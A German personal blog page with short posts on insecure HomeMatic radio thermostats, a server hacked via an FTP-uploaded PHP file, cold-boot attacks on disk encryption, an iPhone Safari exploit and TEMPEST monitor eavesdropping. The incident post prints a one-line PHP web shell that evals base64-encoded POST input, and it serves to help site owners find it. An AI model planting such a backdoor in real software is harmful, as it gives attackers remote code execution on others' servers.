Kategorien
In eigener Sache

HomeMatic Heimautomatisierung gehackt

Da die Heizung hier manchmal etwas spinnt (oder die Thermostate?) habe ich heute nach einer Lösung gesucht und fand sie in elektrisch betriebenen Heizkörperthermostaten. Dort kann man alles möglich einstellen und hat dann einen warmen Heizkörper nach Wunsch.

Natürlich hat der Geek in mir auch gleich die Funkvarianten entdeckt und war dann schon auf ein System von HomeMatic eingeschossen … doch bekam ich dieses Video zu Gesicht:

Mist! Sie verwenden für alle Aktoren und Sensoren zwar ein eigenes Protokoll, aber man kann wohl ziemlich einfach eine Basisstation emulieren (siehe auch das Projekt Homegear). Wenn man also ein paar Thermostate einsetzt, kann jemand anderes den Funkverkehr abhören und so tun als ob er eines der anderen Geräte wäre und Kommandos senden bzw. Daten auslesen. Spitze! Verstellt man also wild die Heizung anderer Leute … Wardriving mal anders (und ausprobierenswert) …

Bevor ist mich jetzt also mit dem Gedanken anfreunde, dass der Heizkörper neben dem Schreibtisch von der Straße aus ferngesteuert werden könnte, kennt jemand eine solche Funklösung, die verschlüsselt arbeitet? Zur Not eine Lösung mit Kabel und ich implementiere die Funkstrecke mit irgendwelchen Billigtransievern mit Verschlüsselung? Im Grunde ist HomeMatic nämlich schon genau das was ich gesucht habe ;-)

Kategorien
In eigener Sache

Über 7c32.php und Mailspam

Der Server auf dem dieses Blog läuft, hostet auch einige andere Webseiten. Eine davon wurde gehackt und hat die letzten Tage unglaubliche Mengen an Spammails versendet. Kann passieren und passiert tatsächlich auch recht oft. Nur dieses Mal war es einfach eine Datei namens 7c32.php, die per FTP hochgeladen wurde und keine Sicherheitslücke von WordPress oder was auch immer man so laufen hat. Davor eine Datei ftpchk3.php um zu prüfen, ob das FTP Verzeichnis auch per Web erreichbar ist.

Der Angreifer wusste also den Benutzernamen, das Passwort und auf welcher Domain dieses Skript laufen würde und hat das genutzt um mit der PHP Funktion mail() Spam zu verschicken. Mitgeschnitten in einem Wifi Netz? Gezielter Hack? Trojaner? Wir wissen es nicht.

Das scheint übrigens ein älterer und vermutlich automatisierter Angriff zu sein. Eine Googlesuche nach 7c32.php bringt einige viele Suchergebnisse, die zum Teil bis 2012 zurückreichen.

Wie dem auch sei … einfach mal in der eigenen Installation von was auch immer (WordPress, Joomla, Webseite mit PHP) nach einer Datei 7c32.php (im Unterverzeichnis css) suchen. Die Datei ftpchk3.php wurde vom Angreifer wieder gelöscht, laut Netz enthält sie aber auch nur den Code:
echo "OK"

Be safe!

P.S.: Der Inhalt von 7c32.php:
< ? php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ? >

Kategorien
Geeky

Festplattenverschlüsselung fürn Arsch

Ok Jungs und Mädels da draußen, die ihr eure Festplatten verschlüsselt und hofft, dass niemand eure geheimsten Daten lesen kann, wenn ihr nicht vorher das Passwort eingegeben habt. Solltet ihr euren Computer nicht komplett ausgeschaltet haben und das für eine längere Zeit, kann man die Verschlüsselung relativ einfach aushebeln wie ein paar schlaue Köpfe der Princeton University herausgefunden haben. Der Schlüssel zum Schlüssel ist nämlich der Arbeitsspeicher. Darin befindet sich das Passwort damit das Betriebssystem die Festplatten lesen kann und das auch nachdem der Strom weg ist, mehr dazu im Video. Das Video zeigt auch wie gekühlter Arbeitsspeicher sogar nach 10 Minuten ohne Strom noch fast keine Bits verloren hat. Man kann den RAM-Riegel sogar ausbauen und in einem anderen Computer auslesen …

So viel dazu. Anfällig sind die Systeme von Vista, Mac OS und auch Linux Verschlüsselungen. Wenn ihr Kleinkriminellen also bisher darauf gebaut habt, dass ihr bei einer plötzlichen Hausdurchsuchung ja nur alles abschalten müsst und ihr seid sicher … tja, dann wartet mal bis ein Beamter mit Kältespray und USB-Stick zu eurem Computer hechtet und danach trotzdem eure Festplatten lesen kann. Gut das werden wohl nicht sehr viele Menschen so machen, aber das Video zeigt ja schon die größte Gefahr: gestohlene Laptops. Selten sind diese Geräte komplett ausgeschaltet und somit allesamt gefährdet. Ein Hardwareproblem, das durch keinen Patch der Welt gelöst werden kann :(

via Crunchgear

Kategorien
Geeky iPhone

Hoffnung auf Firmware 1.1.1

Schon wieder iPhone … naja, interessiert mich eben was um mein neues Spielzeug herum so passiert. Scheinbar haben ein paar schlaue Menschen eine Lücke im Safari Browser gefunden mit dem man Code ausführen kann. Funktioniert sowohl auf dem iPhone als auch auf dem iPod touch. Sehr schön, damit könnte Firmware 1.1.1 bald auch durch Software von Dritten verbessert werden …

… aber leider öffnet sich damit auch ein Tor für Schadprogramme. Denn wer verhindert dann, dass böse Buben in mein iPhone via diesem Exploit einbrechen? Wohl nur ein weiteres Softwareupdate von Apple, das wiederum den größten Fans ihres Gadgets ein weiteres Mal den Spaß verdirbt :-(

Kategorien
Dies und das

Kurze Zusammenfassung

Ich schreibe hier einfach mal eine kurze Zusammenfassung der Artikel, die ich eigentlich noch schreiben wollte, bei denen es sich aber nicht lohnt jetzt noch einen eigenen Artikel daraus zu machen. Und los geht’s :-)

  1. Der rosarote Panther – Review
  2. Xbox 360 wurde gehackt
  3. Grup Tekkan
  4. Tobias Superstar
  5. Terminliste
  6. Panini stinkt
Kategorien
Misc

Lauschangriff

Manche von euch haben bestimmt schon mal davon gelesen, dass man anhand der elektromagnetischen Abstrahlung eines Computermonitors dessen Inhalt ausspionieren kann. Ob das mit LCD-Bildschirmen auch noch so gut funktioniert, weiß ich leider nicht. Aber es gibt tatsächlich ein Programm mit dem man unter Linux den Bildschirm so ansteuern kann, dass man dort abgespielte MP3s auf einem AM-Radio empfangen kann.

Nennt sich Tempest und ich finde es total irre! So etwas ist doch eine ideale Doktorarbeit :-) … wäre da nicht ein Verrückter, der davon inspiriert einen DVB-T-Sender gebaut hat. Aus dem VGA-Ausgang kommen tatsächlich DVB-T-Signale … noch irrer!

Damit wissen wir nun, dass wir beim Pornobilchengucken ständig beobachtet werden: klick (not worksafe)